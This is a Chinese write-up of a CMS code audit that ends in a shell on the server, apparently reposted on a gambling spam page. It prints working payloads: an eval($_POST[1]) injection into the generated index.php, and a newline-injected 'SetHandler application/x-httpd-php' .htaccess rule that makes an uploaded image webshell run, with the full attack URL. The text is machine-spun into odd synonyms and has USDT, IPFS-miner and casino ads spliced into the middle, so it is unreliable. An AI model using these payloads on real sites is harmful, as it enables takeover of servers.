Allbet Gaming

ipfs矿机(www.ipfs8.vip):某CMS代码审计思绪分享

Allbet登录网址 2021年10月22日 科技 104 2

某CMS代码审计思绪分享

前言

​ 大师傅丢给了我一个CMS,说挺简朴的,让我实验审计看看。于是我开启了自己的第一次代码审计。这篇文章主要是讲自己写审计时的一些思绪把,对于代码的剖析照样对照少的。

工具

Vscode:用来查找内容很好评,自带的转到界说转到引用的功效都很好用

Seay源代码审计系统:虽然有时刻在喷这个工具欠好用,然则它能帮我们快速定位可能存在危险的函数,可以帮我们发现一些遗漏的器械,总体来说还行啦

审计

​ 在把环境装好后,先试试网站前台有啥功效,可能会存在啥破绽。

​ 接见了几个页面,都存在ID这个GET请求参数,这里可以判断可能存在SQL注入的破绽,举行测试

​ 当加上单引号就被过滤了,emmmm不幸的最先,这时刻可以使用VScode看看它的WAF是啥样的,有没有时机绕过。

​ 可以知道这个WAF的位置是在Include/contorl.php文件中,而且知道了它运作的原理:当存在GET请求参数时,它会将GET请求参数保留在一个数组中,并对其中的每一个参数举行正则匹配,若是存在要害字则会返回Sorry,You do this is wrong! (.-.)退出剧本。

​ 又在前台逛了一下,并没有发现什么稀奇有用的功效(这个WAF过滤的太狠了),既然云云就去后台看看吧

​ 登录上来就看到了上传点,是一个很好的最先。这里我先上传了一个正常的图片,然后通过查看Burp的内容去寻找源代码

​ 主要代码应该是在Upfile.php这个文件中,于是我们先去看看这个文件的代码

​ 这里能看到网站的logo是可以上传zip文件的,这让我遐想到了使用文件包罗的zip协议的破绽,然后我就上了Seay帮我看看有没有啥文件包罗的破绽

​ 在一众SQL注入XSS提醒中,我找到了这个可以函数最先是一个变量的地方,事实若是最先是写死的(如:file_get_contents('../'.$xxx))这样的咋们也用不了zip协议了,我飞快的跳去看这个函数界说以及挪用它的地方

​ 从这个挪用中,我们可以看到$mblujin是不能控,它要嘛是写死的,要嘛是从数据库中查找的。然则有另外一个变量是可控的$mb

​ 这三步:划分是提取模板文件的数据,将其中的<{Template}>内容换成$mb的内容,然后把它写到网站根目录下

​ 这里对于file_get_contents使用拼接字符串十分敏感,由于可以虚构一个不存在的文件名,然后通过../返回上一级。测试如下

​ 那这里我们可以用相同的方式,将想要的内容写进去,然后返回上一级即可。既然云云就得先看看它读的是那里的文件

,

USDT跑分

U交所(www.9cx.net),全球頂尖的USDT場外擔保交易平臺。

,

index.php是从Templete/default/Include读到的;.htaccess是从Templete/default/Include/hta/d读到的

​ 一最先我的想法是直接将Shell写到index.php,事实直接在.php文件的基础写一定不会错的,看看index.php的源码

<?php
include_once  '<{dirpaths}>Include/web_inc.php';
include_once  '<{dirpaths}>Templete/<{Template}>/Include/Function.php';
$file_url="<{dirpaths}>";
include_once  '<{dirpaths}>Templete/<{Template}>/Include/default.php';
?>

​ 这里闭合代码的话需要闭合单引号,再将后面的内容注释掉就行啦,最后接default是原来模板的文件夹名。

Payload:index.php';eval($_POST[1]);/../default

​ 既然组织好了就得拿上去打了

​ 直接接见Function.php文件不行,由于这里声明晰一个类工具,然则并不是在该文件界说的。

​ 通过右键转到界说,发现它是在网站根目录下的Include/contorl.php文件中被界说的,而这个文件最最先就是谁人WAF过滤。淦!也就是说我们适才组织的Payload不行,由于单引号会报错退出。

​ 然则照样先得找个毗邻这个两个文件的php。

​ 直接用搜索功效就找到了

​ 既然index.php文件用不了,那就转换思绪,试试用.htaccess能不能Getshell,还记得我们之前有一个图片上传的点,那只要将图片看成php文件剖析即可,先看看.htaccess文件代码

RewriteEngine On
RewriteCond %{http_host} ^sem-cms.com [NC]
RewriteRule ^(.*)$ http://www.sem-cms.com/$1 [L,R=301]

<Files ~ “^.(htaccess|htpasswd)$”>
deny from all
</Files>

RewriteRule  ^product.php$  <{dirpaths}>Templete/<{Template}>/Include/product\.php
RewriteRule  ^about.php$  <{dirpaths}>Templete/<{Template}>/Include/about\.php
RewriteRule  ^contact.php$  <{dirpaths}>Templete/<{Template}>/Include/contact\.php
RewriteRule  ^download.php$  <{dirpaths}>Templete/<{Template}>/Include/download\.php
RewriteRule  ^news.php$  <{dirpaths}>Templete/<{Template}>/Include/news\.php
RewriteRule  ^info.php$  <{dirpaths}>Templete/<{Template}>/Include/info\.php
RewriteRule  ^view.php$  <{dirpaths}>Templete/<{Template}>/Include/view\.php
RewriteRule  ^search.php$  <{dirpaths}>Templete/<{Template}>/Include/search\.php
ErrorDocument 404 /Templete/<{Template}>/Include/404.html

​ 可以将前面的内容闭合,接着通过换行符写入我们想要的规则,最后将后面的内容使用注释掉

Payload:index.php%0aSetHandler application/x-httpd-php%0a%23/../../default

​ 接着我们先上传一个图片马

​ 接着凭证返回的路径试试能不能接见

​ 接着使用我们的Payload打一下,这里CF=template是由于功效点的名字(可以看看前面的图片找到)

Payload:Top_include.php?CF=template&mb=index.php%0aSetHandler application/x-httpd-php%0a%23/../../default

​ 接着我们再次接见改图片

​ 乐成的GetShell了!!!

结语

整个审计历程,我是通过了白+黑的方式来看的,当看到可能存在的问题点的时刻可以去看看代码,可能代码中的一些内容就会给你提醒。再者就是仔细吧,有些小细节照样不能放过的,像一最先当我不能行使index.php文件时是想放弃的,然则厥后回忆到了可以上传图片,又重新振作了。迎接人人和我一起学习交流!!!

IPFS招商

IPFS招商官网(www.ipfs8.vip)是FiLecoin致力服务于使用FiLecoin存储和检索数据的官方权威平台。IPFS官网实时更新FiLecoin(FIL)行情、当前FiLecoin(FIL)矿池、FiLecoin(FIL)收益数据、各类FiLecoin(FIL)矿机出售信息。并开放FiLecoin(FIL)交易所、IPFS云矿机、IPFS矿机出售、租用、招商等业务。

Allbet Gaming声明:该文看法仅代表作者自己,与www.allbetgame.us无关。转载请注明:ipfs矿机(www.ipfs8.vip):某CMS代码审计思绪分享
发布评论

分享到:

《扫黑风暴》江疏影饰演的角色不讨人喜欢,被网友说影响观剧体验
2 条回复
  1. 用usdt充值(www.usdt8.vip)
    用usdt充值(www.usdt8.vip)
    (2021-10-01 00:07:03) 1#

    欧博客户端www.aLLbetgame.us),欧博官网是欧博集团的官方网站。欧博官网开放Allbet注册、Allbe代理、Allbet电脑客户端、Allbet手机版下载等业务。

    很厉害的样子

    1. usdt无需实名交易(www.usdt8.vip)
      usdt无需实名交易(www.usdt8.vip)
      (2021-10-04 07:15:14)     

      姐妹们快看神仙

发表评论

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。